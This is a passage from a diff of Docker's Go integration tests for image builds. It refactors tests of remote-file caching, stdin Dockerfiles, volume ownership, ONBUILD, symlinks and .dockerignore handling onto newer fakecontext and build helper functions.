+1960,18 @@ func (s *DockerSuite) TestBuildAddRemoteFileMTime(c *check.C) { name3 := name + "3" files := map[string]string{"baz": "hello"} - server, err := fakeStorage(files) - if err != nil { - c.Fatal(err) - } + server := fakestorage.New(c, "", fakecontext.WithFiles(files)) defer server.Close() - ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM `+minimalBaseImage()+` MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server.URL()), nil) - if err != nil { - c.Fatal(err) - } + ADD %s/baz /usr/lib/baz/quux`, server.URL()))) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - - id2, err := buildImageFromContext(name2, ctx, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) + cli.BuildCmd(c, name2, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name2) if id1 != id2 { c.Fatal("The cache should have been used but wasn't - #1") } @@ -2777,86 +1982,67 @@ func (s *DockerSuite) TestBuildAddRemoteFileMTime(c *check.C) { // allow some time for clock to pass as mtime precision is only 1s time.Sleep(2 * time.Second) - server2, err := fakeStorage(files) - if err != nil { - c.Fatal(err) - } + server2 := fakestorage.New(c, "", fakecontext.WithFiles(files)) defer server2.Close() - ctx2, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + ctx2 := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM `+minimalBaseImage()+` MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server2.URL()), nil) - if err != nil { - c.Fatal(err) - } + ADD %s/baz /usr/lib/baz/quux`, server2.URL()))) defer ctx2.Close() - id3, err := buildImageFromContext(name3, ctx2, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name3, build.WithExternalBuildContext(ctx2)) + id3 := getIDByName(c, name3) if id1 != id3 { c.Fatal("The cache should have been used but wasn't") } } -func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithCache(c *check.C) { +// FIXME(vdemeester) this really seems to test the same thing as before (combined) +func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithAndWithoutCache(c *check.C) { name := "testbuildaddlocalandremotefilewithcache" - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "baz": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() - ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM `+minimalBaseImage()+` MAINTAINER dockerio ADD foo /usr/lib/bla/bar - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - map[string]string{ + ADD %s/baz /usr/lib/baz/quux`, server.URL())), + fakecontext.WithFiles(map[string]string{ "foo": "hello world", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithoutCache, build.WithExternalBuildContext(ctx)) + id3 := getIDByName(c, name) if id1 != id2 { c.Fatal("The cache should have been used but hasn't.") } + if id1 == id3 { + c.Fatal("The cache should have been invalidated but hasn't.") + } } func testContextTar(c *check.C, compression archive.Compression) { - ctx, err := fakeContext( - `FROM busybox + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(`FROM busybox ADD foo /foo -CMD ["cat", "/foo"]`, - map[string]string{ +CMD ["cat", "/foo"]`), + fakecontext.WithFiles(map[string]string{ "foo": "bar", - }, + }), ) - if err != nil { - c.Fatal(err) - } defer ctx.Close() context, err := archive.Tar(ctx.Dir, compression) if err != nil { c.Fatalf("failed to build context tar: %v", err) } name := "contexttar" - buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-") - buildCmd.Stdin = context - if out, _, err := runCommandWithOutput(buildCmd); err != nil { - c.Fatalf("build failed to complete: %v %v", out, err) - } + cli.BuildCmd(c, name, build.WithStdinContext(context)) } func (s *DockerSuite) TestBuildContextTarGzip(c *check.C) { @@ -2868,53 +2054,99 @@ func (s *DockerSuite) TestBuildContextTarNoCompression(c *check.C) { } func (s *DockerSuite) TestBuildNoContext(c *check.C) { - buildCmd := exec.Command(dockerBinary, "build", "-t", "nocontext", "-") - buildCmd.Stdin = strings.NewReader( - `FROM busybox - CMD ["echo", "ok"]`) - - if out, _, err := runCommandWithOutput(buildCmd); err != nil { - c.Fatalf("build failed to complete: %v %v", out, err) - } + name := "nocontext" + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "build", "-t", name, "-"}, + Stdin: strings.NewReader( + `FROM busybox + CMD ["echo", "ok"]`), + }).Assert(c, icmd.Success) if out, _ := dockerCmd(c, "run", "--rm", "nocontext"); out != "ok\n" { c.Fatalf("run produced invalid output: %q, expected %q", out, "ok") } } -// TODO: TestCaching -func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithoutCache(c *check.C) { - name := "testbuildaddlocalandremotefilewithoutcache" - name2 := "testbuildaddlocalandremotefilewithoutcache2" - server, err := fakeStorage(map[string]string{ - "baz": "hello", +// FIXME(vdemeester) migrate to docker/cli e2e +func (s *DockerSuite) TestBuildDockerfileStdin(c *check.C) { + name := "stdindockerfile" + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + err = ioutil.WriteFile(filepath.Join(tmpDir, "foo"), []byte("bar"), 0600) + c.Assert(err, check.IsNil) + + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "build", "-t", name, "-f", "-", tmpDir}, + Stdin: strings.NewReader( + `FROM busybox +ADD foo /foo +CMD ["cat", "/foo"]`), + }).Assert(c, icmd.Success) + + res := inspectField(c, name, "Config.Cmd") + c.Assert(strings.TrimSpace(string(res)), checker.Equals, `[cat /foo]`) +} + +// FIXME(vdemeester) migrate to docker/cli tests (unit or e2e) +func (s *DockerSuite) TestBuildDockerfileStdinConflict(c *check.C) { + name := "stdindockerfiletarcontext" + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "build", "-t", name, "-f", "-", "-"}, + }).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "use stdin for both build context and dockerfile", }) - if err != nil { - c.Fatal(err) - } - defer server.Close() +} - ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` - MAINTAINER dockerio - ADD foo /usr/lib/bla/bar - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - map[string]string{ - "foo": "hello world", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) +func (s *DockerSuite) TestBuildDockerfileStdinNoExtraFiles(c *check.C) { + s.testBuildDockerfileStdinNoExtraFiles(c, false, false) +} + +func (s *DockerSuite) TestBuildDockerfileStdinDockerignore(c *check.C) { + s.testBuildDockerfileStdinNoExtraFiles(c, true, false) +} + +func (s *DockerSuite) TestBuildDockerfileStdinDockerignoreIgnored(c *check.C) { + s.testBuildDockerfileStdinNoExtraFiles(c, true, true) +} + +func (s *DockerSuite) testBuildDockerfileStdinNoExtraFiles(c *check.C, hasDockerignore, ignoreDockerignore bool) { + name := "stdindockerfilenoextra" + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + defer os.RemoveAll(tmpDir) + + writeFile := func(filename, content string) { + err = ioutil.WriteFile(filepath.Join(tmpDir, filename), []byte(content), 0600) + c.Assert(err, check.IsNil) } - id2, err := buildImageFromContext(name2, ctx, false) - if err != nil { - c.Fatal(err) + + writeFile("foo", "bar") + + if hasDockerignore { + // Add an empty Dockerfile to verify that it is not added to the image + writeFile("Dockerfile", "") + + ignores := "Dockerfile\n" + if ignoreDockerignore { + ignores += ".dockerignore\n" + } + writeFile(".dockerignore", ignores) } - if id1 == id2 { - c.Fatal("The cache should have been invalidated but hasn't.") + + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "build", "-t", name, "-f", "-", tmpDir}, + Stdin: strings.NewReader( + `FROM busybox +COPY . /baz`), + }) + result.Assert(c, icmd.Success) + + result = cli.DockerCmd(c, "run", "--rm", name, "ls", "-A", "/baz") + if hasDockerignore && !ignoreDockerignore { + c.Assert(result.Stdout(), checker.Equals, ".dockerignore\nfoo\n") + } else { + c.Assert(result.Stdout(), checker.Equals, "foo\n") } } @@ -2922,22 +2154,14 @@ func (s *DockerSuite) TestBuildWithVolumeOwnership(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildimg" - _, err := buildImage(name, - `FROM busybox:latest + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox:latest RUN mkdir /test && chown daemon:daemon /test && chmod 0600 /test - VOLUME /test`, - true) - - if err != nil { - c.Fatal(err) - } + VOLUME /test`)) out, _ := dockerCmd(c, "run", "--rm", "testbuildimg", "ls", "-la", "/test") - if expected := "drw-------"; !strings.Contains(out, expected) { c.Fatalf("expected %s received %s", expected, out) } - if expected := "daemon daemon"; !strings.Contains(out, expected) { c.Fatalf("expected %s received %s", expected, out) } @@ -2948,27 +2172,16 @@ func (s *DockerSuite) TestBuildWithVolumeOwnership(c *check.C) { // utilizing cache func (s *DockerSuite) TestBuildEntrypointRunCleanup(c *check.C) { name := "testbuildcmdcleanup" - if _, err := buildImage(name, - `FROM busybox - RUN echo "hello"`, - true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + RUN echo "hello"`)) - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo "hello" ADD foo /foo - ENTRYPOINT ["/bin/echo"]`, - map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + ENTRYPOINT ["/bin/echo"]`), + build.WithFile("foo", "hello"))) + res := inspectField(c, name, "Config.Cmd") // Cmd must be cleaned up if res != "[]" { @@ -2980,46 +2193,29 @@ func (s *DockerSuite) TestBuildAddFileNotFound(c *check.C) { name := "testbuildaddnotfound" expected := "foo: no such file or directory" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = "foo: The system cannot find the file specified" } - ctx, err := fakeContext(`FROM `+minimalBaseImage()+` - ADD foo /usr/local/bar`, - map[string]string{"bar": "hello"}) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - if !strings.Contains(err.Error(), expected) { - c.Fatalf("Wrong error %v, must be about missing foo file or directory", err) - } - } else { - c.Fatal("Error must not be nil") - } + buildImage(name, build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM `+minimalBaseImage()+` + ADD foo /usr/local/bar`), + build.WithFile("bar", "hello"))).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: expected, + }) } func (s *DockerSuite) TestBuildInheritance(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildinheritance" - _, err := buildImage(name, - `FROM scratch - EXPOSE 2375`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch + EXPOSE 2375`)) ports1 := inspectField(c, name, "Config.ExposedPorts") - _, err = buildImage(name, - fmt.Sprintf(`FROM %s - ENTRYPOINT ["/bin/echo"]`, name), - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM %s + ENTRYPOINT ["/bin/echo"]`, name))) res := inspectField(c, name, "Config.Entrypoint") if expected := "[/bin/echo]"; res != expected { @@ -3033,78 +2229,52 @@ func (s *DockerSuite) TestBuildInheritance(c *check.C) { func (s *DockerSuite) TestBuildFails(c *check.C) { name := "testbuildfails" - _, err := buildImage(name, - `FROM busybox - RUN sh -c "exit 23"`, - true) - if err != nil { - if !strings.Contains(err.Error(), "returned a non-zero code: 23") { - c.Fatalf("Wrong error %v, must be about non-zero code 23", err) - } - } else { - c.Fatal("Error must not be nil") - } + buildImage(name, build.WithDockerfile(`FROM busybox + RUN sh -c "exit 23"`)).Assert(c, icmd.Expected{ + ExitCode: 23, + Err: "returned a non-zero code: 23", + }) } func (s *DockerSuite) TestBuildOnBuild(c *check.C) { name := "testbuildonbuild" - _, err := buildImage(name, - `FROM busybox - ONBUILD RUN touch foobar`, - true) - if err != nil { - c.Fatal(err) - } - _, err = buildImage(name, - fmt.Sprintf(`FROM %s - RUN [ -f foobar ]`, name), - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + ONBUILD RUN touch foobar`)) + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM %s + RUN [ -f foobar ]`, name))) } // gh #2446 func (s *DockerSuite) TestBuildAddToSymlinkDest(c *check.C) { makeLink := `ln -s /foo /bar` - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { makeLink = `mklink /D C:\bar C:\foo` } name := "testbuildaddtosymlinkdest" - ctx, err := fakeContext(`FROM busybox - RUN sh -c "mkdir /foo" - RUN `+makeLink+` - ADD foo /bar/ - RUN sh -c "[ -f /bar/foo ]" - RUN sh -c "[ -f /foo/foo ]"`, - map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` + FROM busybox + RUN sh -c "mkdir /foo" + RUN `+makeLink+` + ADD foo /bar/ + RUN sh -c "[ -f /bar/foo ]" + RUN sh -c "[ -f /foo/foo ]"`), + build.WithFile("foo", "hello"), + )) } func (s *DockerSuite) TestBuildEscapeWhitespace(c *check.C) { name := "testbuildescapewhitespace" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` # ESCAPE=\ FROM busybox MAINTAINER "Docker \ IO " - `, true) - if err != nil { - c.Fatal(err) - } + `)) res := inspectField(c, name, "Author") - if res != "\"Docker IO \"" { c.Fatalf("Parsed string did not match the escaped string. Got: %q", res) } @@ -3115,17 +2285,11 @@ func (s *DockerSuite) TestBuildVerifyIntString(c *check.C) { // Verify that strings that look like ints are still passed as strings name := "testbuildstringing" - _, err := buildImage(name, ` - FROM busybox - MAINTAINER 123 - `, true) - - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(` + FROM busybox + MAINTAINER 123`)) out, _ := dockerCmd(c, "inspect", name) - if !strings.Contains(out, "\"123\"") { c.Fatalf("Output does not contain the int as a string:\n%s", out) } @@ -3134,9 +2298,10 @@ func (s *DockerSuite) TestBuildVerifyIntString(c *check.C) { func (s *DockerSuite) TestBuildDockerignore(c *check.C) { name := "testbuilddockerignore" - dockerfile := ` - FROM busybox - ADD . /bla + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` + FROM busybox + ADD . /bla RUN sh -c "[[ -f /bla/src/x.go ]]" RUN sh -c "[[ -f /bla/Makefile ]]" RUN sh -c "[[ ! -e /bla/src/_vendor ]]" @@ -3147,62 +2312,48 @@ func (s *DockerSuite) TestBuildDockerignore(c *check.C) { RUN sh -c "[[ ! -e /bla/.git ]]" RUN sh -c "[[ ! -e v.cc ]]" RUN sh -c "[[ ! -e src/v.cc ]]" - RUN sh -c "[[ ! -e src/_vendor/v.cc ]]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Makefile": "all:", - ".git/HEAD": "ref: foo", - "src/x.go": "package main", - "src/_vendor/v.go": "package main", - "src/_vendor/v.cc": "package main", - "src/v.cc": "package main", - "v.cc": "package main", - "dir/foo": "", - ".gitignore": "", - "README.md": "readme", - ".dockerignore": ` + RUN sh -c "[[ ! -e src/_vendor/v.cc ]]"`), + build.WithFile("Makefile", "all:"), + build.WithFile(".git/HEAD", "ref: foo"), + build.WithFile("src/x.go", "package main"), + build.WithFile("src/_vendor/v.go", "package main"), + build.WithFile("src/_vendor/v.cc", "package main"), + build.WithFile("src/v.cc", "package main"), + build.WithFile("v.cc", "package main"), + build.WithFile("dir/foo", ""), + build.WithFile(".gitignore", ""), + build.WithFile("README.md", "readme"), + build.WithFile(".dockerignore", ` .git pkg .gitignore src/_vendor *.md **/*.cc -dir`, - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +dir`), + )) } func (s *DockerSuite) TestBuildDockerignoreCleanPaths(c *check.C) { name := "testbuilddockerignorecleanpaths" - dockerfile := ` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM busybox ADD . /tmp/ - RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (! ls /tmp/dir1/foo)"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "foo", - "foo2": "foo2", - "dir1/foo": "foo in dir1", - ".dockerignore": "./foo\ndir1//foo\n./dir1/../foo2", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (! ls /tmp/dir1/foo)"`), + build.WithFile("foo", "foo"), + build.WithFile("foo2", "foo2"), + build.WithFile("dir1/foo", "foo in dir1"), + build.WithFile(".dockerignore", "./foo\ndir1//foo\n./dir1/../foo2"), + )) } func (s *DockerSuite) TestBuildDockerignoreExceptions(c *check.C) { name := "testbuilddockerignoreexceptions" - dockerfile := ` - FROM busybox - ADD . /bla + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` + FROM busybox + ADD . /bla RUN sh -c "[[ -f /bla/src/x.go ]]" RUN sh -c "[[ -f /bla/Makefile ]]" RUN sh -c "[[ ! -e /bla/src/_vendor ]]" @@ -3214,22 +2365,21 @@ func (s *DockerSuite) TestBuildDockerignoreExceptions(c *check.C) { RUN sh -c "[[ -f /bla/dir/e-dir/foo ]]" RUN sh -c "[[ ! -e /bla/foo ]]" RUN sh -c "[[ ! -e /bla/.git ]]" - RUN sh -c "[[ -e /bla/dir/a.cc ]]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Makefile": "all:", - ".git/HEAD": "ref: foo", - "src/x.go": "package main", - "src/_vendor/v.go": "package main", - "dir/foo": "", - "dir/foo1": "", - "dir/dir/f1": "", - "dir/dir/foo": "", - "dir/e": "", - "dir/e-dir/foo": "", - ".gitignore": "", - "README.md": "readme", - "dir/a.cc": "hello", - ".dockerignore": ` + RUN sh -c "[[ -e /bla/dir/a.cc ]]"`), + build.WithFile("Makefile", "all:"), + build.WithFile(".git/HEAD", "ref: foo"), + build.WithFile("src/x.go", "package main"), + build.WithFile("src/_vendor/v.go", "package main"), + build.WithFile("dir/foo", ""), + build.WithFile("dir/foo1", ""), + build.WithFile("dir/dir/f1", ""), + build.WithFile("dir/dir/foo", ""), + build.WithFile("dir/e", ""), + build.WithFile("dir/e-dir/foo", ""), + build.WithFile(".gitignore", ""), + build.WithFile("README.md", "readme"), + build.WithFile("dir/a.cc", "hello"), + build.WithFile(".dockerignore", ` .git pkg .gitignore @@ -3239,228 +2389,174 @@ dir !dir/e* !dir/dir/foo **/*.cc -!**/*.cc`, - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +!**/*.cc`), + )) } func (s *DockerSuite) TestBuildDockerignoringDockerfile(c *check.C) { name := "testbuilddockerignoredockerfile" dockerfile := ` - FROM busybox + FROM busybox ADD . /tmp/ RUN sh -c "! ls /tmp/Dockerfile" RUN ls /tmp/.dockerignore` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": dockerfile, - ".dockerignore": "Dockerfile\n", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't ignore Dockerfile correctly:%s", err) - } - - // now try it with ./Dockerfile - ctx.Add(".dockerignore", "./Dockerfile\n") - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't ignore ./Dockerfile correctly:%s", err) - } - + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", "Dockerfile\n"), + )) + // FIXME(vdemeester) why twice ? + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", "./Dockerfile\n"), + )) } func (s *DockerSuite) TestBuildDockerignoringRenamedDockerfile(c *check.C) { name := "testbuilddockerignoredockerfile" dockerfile := ` - FROM busybox + FROM busybox ADD . /tmp/ RUN ls /tmp/Dockerfile RUN sh -c "! ls /tmp/MyDockerfile" RUN ls /tmp/.dockerignore` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": "Should not use me", - "MyDockerfile": dockerfile, - ".dockerignore": "MyDockerfile\n", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't ignore MyDockerfile correctly:%s", err) - } - - // now try it with ./MyDockerfile - ctx.Add(".dockerignore", "./MyDockerfile\n") - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't ignore ./MyDockerfile correctly:%s", err) - } - + buildImageSuccessfully(c, name, cli.WithFlags("-f", "MyDockerfile"), build.WithBuildContext(c, + build.WithFile("Dockerfile", "Should not use me"), + build.WithFile("MyDockerfile", dockerfile), + build.WithFile(".dockerignore", "MyDockerfile\n"), + )) + // FIXME(vdemeester) why twice ? + buildImageSuccessfully(c, name, cli.WithFlags("-f", "MyDockerfile"), build.WithBuildContext(c, + build.WithFile("Dockerfile", "Should not use me"), + build.WithFile("MyDockerfile", dockerfile), + build.WithFile(".dockerignore", "./MyDockerfile\n"), + )) } func (s *DockerSuite) TestBuildDockerignoringDockerignore(c *check.C) { name := "testbuilddockerignoredockerignore" dockerfile := ` - FROM busybox + FROM busybox ADD . /tmp/ RUN sh -c "! ls /tmp/.dockerignore" RUN ls /tmp/Dockerfile` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": dockerfile, - ".dockerignore": ".dockerignore\n", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't ignore .dockerignore correctly:%s", err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", ".dockerignore\n"), + )) } func (s *DockerSuite) TestBuildDockerignoreTouchDockerfile(c *check.C) { - var id1 string - var id2 string - name := "testbuilddockerignoretouchdockerfile" dockerfile := ` FROM busybox ADD . /tmp/` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": dockerfile, - ".dockerignore": "Dockerfile\n", - }) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + ".dockerignore": "Dockerfile\n", + })) defer ctx.Close() - if id1, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't build it correctly:%s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) - if id2, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't build it correctly:%s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id1 != id2 { c.Fatalf("Didn't use the cache - 1") } // Now make sure touching Dockerfile doesn't invalidate the cache - if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { + if err := ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { c.Fatalf("Didn't add Dockerfile: %s", err) } - if id2, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't build it correctly:%s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 = getIDByName(c, name) if id1 != id2 { c.Fatalf("Didn't use the cache - 2") } // One more time but just 'touch' it instead of changing the content - if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { + if err := ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { c.Fatalf("Didn't add Dockerfile: %s", err) } - if id2, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("Didn't build it correctly:%s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 = getIDByName(c, name) if id1 != id2 { c.Fatalf("Didn't use the cache - 3") } - } func (s *DockerSuite) TestBuildDockerignoringWholeDir(c *check.C) { name := "testbuilddockerignorewholedir" + dockerfile := ` - FROM busybox + FROM busybox COPY . / RUN sh -c "[[ ! -e /.gitignore ]]" - RUN sh -c "[[ -f /Makefile ]]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": "FROM scratch", - "Makefile": "all:", - ".gitignore": "", - ".dockerignore": ".*\n", - }) - c.Assert(err, check.IsNil) - defer ctx.Close() - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + RUN sh -c "[[ ! -e /Makefile ]]"` - c.Assert(ctx.Add(".dockerfile", "*"), check.IsNil) - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", "*\n"), + build.WithFile("Makefile", "all:"), + build.WithFile(".gitignore", ""), + )) +} - c.Assert(ctx.Add(".dockerfile", "."), check.IsNil) - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +func (s *DockerSuite) TestBuildDockerignoringOnlyDotfiles(c *check.C) { + name := "testbuilddockerignorewholedir" - c.Assert(ctx.Add(".dockerfile", "?"), check.IsNil) - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + dockerfile := ` + FROM busybox + COPY . / + RUN sh -c "[[ ! -e /.gitignore ]]" + RUN sh -c "[[ -f /Makefile ]]"` + + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", ".*"), + build.WithFile("Makefile", "all:"), + build.WithFile(".gitignore", ""), + )) } func (s *DockerSuite) TestBuildDockerignoringBadExclusion(c *check.C) { name := "testbuilddockerignorebadexclusion" - dockerfile := ` - FROM busybox + buildImage(name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` + FROM busybox COPY . / RUN sh -c "[[ ! -e /.gitignore ]]" - RUN sh -c "[[ -f /Makefile ]]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": "FROM scratch", - "Makefile": "all:", - ".gitignore": "", - ".dockerignore": "!\n", + RUN sh -c "[[ -f /Makefile ]]"`), + build.WithFile("Makefile", "all:"), + build.WithFile(".gitignore", ""), + build.WithFile(".dockerignore", "!\n"), + )).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: `illegal exclusion pattern: "!"`, }) - c.Assert(err, check.IsNil) - defer ctx.Close() - if _, err = buildImageFromContext(name, ctx, true); err == nil { - c.Fatalf("Build was supposed to fail but didn't") - } - - if err.Error() != "failed to build the image: Error checking context: 'Illegal exclusion pattern: !'.\n" { - c.Fatalf("Incorrect output, got:%q", err.Error()) - } } func (s *DockerSuite) TestBuildDockerignoringWildTopDir(c *check.C) { dockerfile := ` - FROM busybox + FROM busybox COPY . / RUN sh -c "[[ ! -e /.dockerignore ]]" RUN sh -c "[[ ! -e /Dockerfile ]]" RUN sh -c "[[ ! -e /file1 ]]" RUN sh -c "[[ ! -e /dir ]]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": "FROM scratch", - "file1": "", - "dir/dfile1": "", - }) - c.Assert(err, check.IsNil) - defer ctx.Close() - // All of these should result in ignoring all files for _, variant := range []string{"**", "**/", "**/**", "*"} { - ctx.Add(".dockerignore", variant) - _, err = buildImageFromContext("noname", ctx, true) - c.Assert(err, check.IsNil, check.Commentf("variant: %s", variant)) + buildImageSuccessfully(c, "noname", build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("file1", ""), + build.WithFile("dir/file1", ""), + build.WithFile(".dockerignore", variant), + )) + + dockerCmd(c, "rmi", "noname") } } @@ -3491,31 +2587,7 @@ func (s *DockerSuite) TestBuildDockerignoringWildDirs(c *check.C) { RUN echo all done!` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": "FROM scratch", - "file0": "", - "dir1/file0": "", - "dir1/dir2/file0": "", - - "file1": "", - "dir1/file1": "", - "dir1/dir2/file1": "", - - "dir1/file2": "", - "dir1/dir2/file2": "", // remains - - "dir1/dir2/file4": "", - "dir1/dir2/file5": "", - "dir1/dir2/file6": "", - "dir1/dir3/file7": "", - "dir1/dir3/file8": "", - "dir1/dir4/file9": "", - - "dir1/dir5/fileAA": "", - "dir1/dir5/fileAB": "", - "dir1/dir5/fileB": "", - - ".dockerignore": ` + dockerignore := ` **/file0 **/*file1 **/dir1/file2 @@ 